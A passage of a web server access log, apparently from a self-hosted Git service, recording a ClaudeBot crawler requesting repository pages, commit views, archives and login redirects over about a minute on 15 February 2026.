216.73.216.188] [Length 24362] [Gzip 5.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:11:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/services/geminiService.ts" [Client 216.73.216.188] [Length 13138] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:11:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/html/assets/js" [Client 216.73.216.188] [Length 10825] [Gzip 4.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:11:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/services/geminiService.ts?display=rendered" [Client 216.73.216.188] [Length 11122] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:11:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?files=OpcUaMinimal%2FTestService%2FProgram.cs" [Client 216.73.216.188] [Length 21498] [Gzip 3.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:11:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2FAssetPilot%2Fsrc%2Fcommit%2Ffc1462a3f3e004bb33b52808fd01df2dfdbf79d3%2F.TemporaryDocument" [Client 216.73.216.188] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:11:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fdbserver%2Fsrc%2Fbranch%2Fmain%2FOpcUaMinimal%2Fobj%2FDebug" [Client 216.73.216.188] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:11:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96?files=asset_pilot_docker%2Fstatic%2Fcss" [Client 216.73.216.188] [Length 60975] [Gzip 11.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:11:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/archive/adf9a81cb0ea52c9fa32f352b5800e021665bb47.bundle" [Client 216.73.216.188] [Length 274126] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:11:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/components/Header.tsx" [Client 216.73.216.188] [Length 14812] [Gzip 4.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:11:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.g.targets?display=rendered" [Client 216.73.216.188] [Length 11196] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:11:33 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_new/main/asset_pilot_docker/.venv/include" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:11:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/.Backup/html/components" [Client 216.73.216.188] [Length 9781] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:11:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_new/main/asset_pilot_docker/.venv/include" -[15/Feb/2026:12:11:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?files=OpcUaMinimal%2FTestService%2Fappsettings.Development.json" [Client 216.73.216.188] [Length 21426] [Gzip 3.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:11:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/include/site/python3.12/greenlet/greenlet.h" [Client 216.73.216.188] [Length 15773] [Gzip 5.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:11:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/npm/letsencrypt" [Client 216.73.216.188] [Length 9812] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:11:34 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_delete/main/asset_pilot_docker/.venv/include/site/python3.12/greenlet/greenlet.h" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:11:34 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_edit/main/asset_pilot_docker/.venv/include/site/python3.12/greenlet/greenlet.h" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:11:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_delete/main/asset_pilot_docker/.venv/include/site/python3.12/greenlet/greenlet.h" -[15/Feb/2026:12:11:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/package.json" [Client 216.73.216.188] [Length 11700] [Gzip 3.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:11:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_edit/main/asset_pilot_docker/.venv/include/site/python3.12/greenlet/greenlet.h" -[15/Feb/2026:12:11:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/.gitignore" [Client 216.73.216.188] [Length 11452] [Gzip 3.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:11:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/templates/index.html" [Client 216.73.216.188] [Length 15726] [Gzip 5.61] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:11:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/npm/data/keys.json" [Client 216.73.216.188] [Length 9827] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:11:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html?display=rendered" [Client 216.73.216.188] [Length 14139] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:11:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/services/geminiService.ts" [Client 216.73.216.188] [Length 13140] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:11:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin" [Client 216.73.216.188] [Length 11676] [Gzip 4.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:11:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/update_status.py?display=rendered" [Client 216.73.216.188] [Length 10837] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:11:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/npm/data/keys.json" [Client 216.73.216.188] [Length 914] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:11:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.TemporaryDocument/asset_pilot_docker.tar.gz" [Client 216.73.216.188] [Length 10908] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:11:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2FAssetPilot%2Fsrc%2Fcommit%2F1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa%2F.gitignore" [Client 216.73.216.188] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:11:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html?display=rendered" [Client 216.73.216.188] [Length 14351] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:11:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/2681563c08aa04fbea2862fbca273762e67c16d6" [Client 216.73.216.188] [Length 77634] [Gzip 10.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:12:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F66e18d23c91cd4d290b6cecfdc88680af2fb97e2%2F.Backup%2Fupdate_status.py" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:12:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2Febd2be03a23e76e126207d40a257d72f40ab9a7c%2Fhtml" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:12:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fdbserver%2Fsrc%2Fbranch%2Fmain%2FOpcUaMinimal%2FTestService%2Fobj%2Fproject.nuget.cache" [Client 216.73.216.188] [Length 4852] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:12:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/README.md?display=source" [Client 216.73.216.188] [Length 11761] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:12:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/metadata.json?display=rendered" [Client 216.73.216.188] [Length 10905] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:12:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images/ControlRoom1.png" [Client 216.73.216.188] [Length 10847] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:12:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2Fa0a212e41c7ebc2699ea736d71d145b9844673ec%2Fhtml" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:12:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/vite.config.ts" [Client 216.73.216.188] [Length 9878] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:12:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/README.md?display=source" [Client 216.73.216.188] [Length 11758] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:12:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/index.html" [Client 216.73.216.188] [Length 43840] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:12:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images/ControlRoom6.png" [Client 216.73.216.188] [Length 10842] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:12:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2FAssetPilot%2Fsrc%2Fcommit%2Ffc1462a3f3e004bb33b52808fd01df2dfdbf79d3%2Fasset_pilot_docker%2F.venv" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:12:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F66e18d23c91cd4d290b6cecfdc88680af2fb97e2%2Fhtml%2Fassets%2Fjs" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:12:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/package.json?display=rendered" [Client 216.73.216.188] [Length 10883] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:12:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/types.ts" [Client 216.73.216.188] [Length 302] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:12:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F7e5f452449b5385fa46a3a589ed6aac00a02734a%2Fhtml%2Findex.html" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:12:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/App.tsx?display=rendered" [Client 216.73.216.188] [Length 10870] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:12:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/index.tsx?display=source" [Client 216.73.216.188] [Length 11630] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:12:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/tsconfig.json?display=source" [Client 216.73.216.188] [Length 11875] [Gzip 3.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:12:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/package.json?display=rendered" [Client 216.73.216.188] [Length 10877] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:12:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/services" [Client 216.73.216.188] [Length 9876] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:12:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fdbserver%2Fcommits%2Fbranch%2Fmain%2FOpcUaMinimal%2FTestService%2FProgram.cs" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:12:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fbranch%2Fmain%2Fnpm%2Fdata%2Fdatabase.sqlite" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:12:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/branch/main/asset_pilot_docker/.venv/include" [Client 216.73.216.188] [Length 9832] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:12:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec?files=npm%2Fdata%2Fnginx%2Fproxy_host" [Client 216.73.216.188] [Length 35610] [Gzip 8.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:12:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument/MIGRATION_GUIDE.md?display=rendered" [Client 216.73.216.188] [Length 15810] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:12:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/components/Contact.tsx?display=rendered" [Client 216.73.216.188] [Length 10916] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:12:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images/ControlRoom5.png" [Client 216.73.216.188] [Length 10845] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:12:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/tsconfig.json?display=source" [Client 216.73.216.188] [Length 11868] [Gzip 3.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:12:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/vite.config.ts" [Client 216.73.216.188] [Length 580] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:12:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F66e18d23c91cd4d290b6cecfdc88680af2fb97e2%2Fupdate_status.py" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:12:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/types.ts" [Client 216.73.216.188] [Length 302] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:12:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2FAssetPilot%2Fsrc%2Fcommit%2Fadf9a81cb0ea52c9fa32f352b5800e021665bb47" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:12:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/components/Footer.tsx?display=rendered" [Client 216.73.216.188] [Length 10911] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:12:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/services" [Client 216.73.216.188] [Length 9873] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:12:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/services/geminiService.ts" [Client 216.73.216.188] [Length 13175] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; 